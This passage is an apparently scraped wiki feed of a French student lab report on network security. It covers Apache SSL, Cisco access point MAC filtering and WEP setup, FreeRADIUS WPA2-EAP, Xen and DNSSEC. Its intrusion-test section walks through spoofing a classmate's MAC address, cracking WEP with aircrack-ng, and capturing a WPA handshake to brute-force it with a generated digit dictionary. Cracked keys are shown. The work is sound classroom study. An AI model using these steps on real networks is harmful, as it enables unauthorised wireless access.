    &amp;lt;VirtualHost 193.48.57.181:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.love-in-the-world.space&lt;br /&gt;
        ServerAlias love-in-the-world.space&lt;br /&gt;
        DocumentRoot /var/www/html/&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
        SSLCertificateFile /root/chien.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/chien.key&lt;br /&gt;
        SSLCertificateChainFile /root/gandi.crt&lt;br /&gt;
        SSLVerifyClient None&lt;br /&gt;
&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#a2enmod ssl&lt;br /&gt;
#service apache2 reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Test d'intrusion &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci.  &lt;br /&gt;
&lt;br /&gt;
Changement d'adresse MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On change la cles par: 0000000000&lt;br /&gt;
et le SSID : T1&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# cat /etc/network/interfaces&lt;br /&gt;
# source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
# auto lo&lt;br /&gt;
# iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
Ethernet interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
  address 172.26.79.241&lt;br /&gt;
  netmask 255.255.240.0&lt;br /&gt;
  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key 0000000000&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Préparation aux cassage de clés&amp;lt;/h2&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WEP &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w&lt;br /&gt;
fcracotte06&lt;br /&gt;
&lt;br /&gt;
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# ls&lt;br /&gt;
# aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                 [00:06:58] Tested 965565 keys (got 60459 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) &lt;br /&gt;
    1    0/  1   AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) &lt;br /&gt;
    2    0/  1   AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) &lt;br /&gt;
    3    4/  5   AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) &lt;br /&gt;
    4    0/  1   AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) &lt;br /&gt;
    5    0/  1   AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) &lt;br /&gt;
    6    0/  1   AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) &lt;br /&gt;
    7    0/  1   AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) &lt;br /&gt;
    8    0/  1   AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) &lt;br /&gt;
    9    0/  3   D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) &lt;br /&gt;
   10    0/  1   5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) &lt;br /&gt;
   11   13/  1   48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) &lt;br /&gt;
   12    0/  1   BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WPA&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie consiste a casser une clés WPA par force brute.&lt;br /&gt;
Je m'interesse plus particulierement a caracotte06 comme précédament.&lt;br /&gt;
 &lt;br /&gt;
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake.   &lt;br /&gt;
&lt;br /&gt;
Recuperation du Handshake: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06&lt;br /&gt;
&lt;br /&gt;
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
creation d'un dictionaire :&lt;br /&gt;
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.&lt;br /&gt;
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
# gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# ./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cassage de la cles: &lt;br /&gt;
après avoir récuperer le Handshake du Wifi carotte06&lt;br /&gt;
Je vais casser la clés en utilisant mon dictionnaire &amp;quot;Dico&amp;quot; le fichier &amp;quot;wpacracotte06-02.cap&amp;quot;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w Dico wpacracotte06-02.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
après quelle que heures j'obtiens la clès:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [02:00:57] 12399908 keys tested (1782.72 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399906 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 4B 0E E0 87 93 06 14 C0 E2 64 55 76 95 9A 30 6B &lt;br /&gt;
                       75 7C 8F CC B4 F8 2B 0D 78 3A 57 04 79 C2 F9 72 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 63 0F 9B D4 8B 09 C9 2C D5 E2 56 3D C7 21 AC 9E &lt;br /&gt;
                       94 5C E6 F7 19 FB EA 52 3F 02 C4 10 72 4F B8 7E &lt;br /&gt;
                       F1 92 CC 2C 02 E1 F7 47 C1 1D F2 FD CE EF F5 5E &lt;br /&gt;
                       22 24 87 42 46 4F D6 38 DF D4 CC 6D 61 4E 1D 7E &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : A3 D3 FD F5 09 AC B9 96 F5 0E 93 0A 3C 63 36 CD &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23393</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23393"/>
				<updated>2015-11-27T13:49:34Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Ce mini projet a pour but de nous donner des notion en sécurité informatique.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Configuration du point d’accès&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Restriction par adresse MAC &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès Cisco &amp;lt;/h3&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du Wifi sur l'eeePC&amp;lt;/h3&amp;gt;&lt;br /&gt;
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.&lt;br /&gt;
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. &lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Sécurisation Wifi par WPA2-EAP&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès&amp;lt;/h3&amp;gt;&lt;br /&gt;
On commence par remettre le point d’accès en configuration d'usine &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap#erase startup-config&lt;br /&gt;
ap#reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#line vty 0 15 &lt;br /&gt;
ap(config-line)#password ****&lt;br /&gt;
&lt;br /&gt;
ap(config)#ip default-gateway 172.20.99.254&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface bvi 1 &lt;br /&gt;
ap(config-if)#ip ad 172.20.99.6 255.255.255.0 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration de la machine virtuel&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe freeradius: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# apt-get install FreeRadius&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On configure la conexion:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# nano eap.conf&lt;br /&gt;
// on remplace &lt;br /&gt;
default_eap_type = md5&lt;br /&gt;
// par&lt;br /&gt;
default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
# nano clients.conf &lt;br /&gt;
client 172.20.99.0/24 {&lt;br /&gt;
        secret          = topsecret&lt;br /&gt;
        shortname       = wifi&lt;br /&gt;
&lt;br /&gt;
# nano users &lt;br /&gt;
john    Cleartext-Password := &amp;quot;****&amp;quot;&lt;br /&gt;
&lt;br /&gt;
# service freeradius restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Installation des systèmes d'exploitation &amp;lt;/h1&amp;gt;&lt;br /&gt;
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.&lt;br /&gt;
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.&lt;br /&gt;
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. &lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h2&amp;gt;Installation de la machine virtuel&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie concerne l’installation du machine virtuel Xen.&lt;br /&gt;
Nous installons Xen car celui-ci permet de faire de la  paravirtualisation. &lt;br /&gt;
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps &lt;br /&gt;
&lt;br /&gt;
Les étapes a suivre pour l’installation de Xen sur cordouan:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration de Xen:&lt;br /&gt;
- On autorise les connexion ssh en root&lt;br /&gt;
- On retire Network Manger pour configurer la connexion au réseau manuellement &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# /etc/ssh/sshd_config&lt;br /&gt;
# PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
# if down eth0 &lt;br /&gt;
# ifup etho&lt;br /&gt;
# apt-get purge network-manage systemd &lt;br /&gt;
# inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@chien:~# apt-get install vim strace tcpdump &lt;br /&gt;
root@chien:~# apt-get install host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Services Internet &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Serveur DNS&amp;lt;/h2&amp;gt;&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cat /etc/bind/named.conf.options &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
host -t ni love-in-the-world.space&lt;br /&gt;
host -t any love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
cat db.love-in-the-world &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
cat /var/log/daemon.log&lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
# service bind9 stop&lt;br /&gt;
# service bind9 start&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Géneration d'une clés assymetrique:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE love-in-the-world.space&lt;br /&gt;
Generating key pair...........+++ ....................+++ &lt;br /&gt;
Klove-in-the-world.space.+005+14281&lt;br /&gt;
# mv Klove-in-the-world.space.+005+14281.key  love-in-the-world-ksk.key&lt;br /&gt;
# mv Klove-in-the-world.space.+005+14281.private  love-in-the-world-ksk.private&lt;br /&gt;
&lt;br /&gt;
# dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE love-in-the-world.space&lt;br /&gt;
Generating key pair........++++++ .....................++++++ &lt;br /&gt;
Klove-in-the-world.space.+005+37866&lt;br /&gt;
# mv Klove-in-the-world.space.+005+37866.key  love-in-the-world-zsk.key&lt;br /&gt;
# mv Klove-in-the-world.space.+005+37866.private  love-in-the-world-zsk.private&lt;br /&gt;
&lt;br /&gt;
# dnssec-signzone -o love-in-the-world.space -k love-in-the-world-ksk ../db.love-in-the-world love-in-the-world-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.love-in-the-world.signed&lt;br /&gt;
root@chien:/etc/bind/love-in-the-world# &lt;br /&gt;
&lt;br /&gt;
:/etc/bind# nano named.conf.local &lt;br /&gt;
zone &amp;quot;love-in-the-world.space&amp;quot;{&lt;br /&gt;
&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.love-in-the-world.signed&amp;quot;;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ensuite on copie le contenu du fichier:&lt;br /&gt;
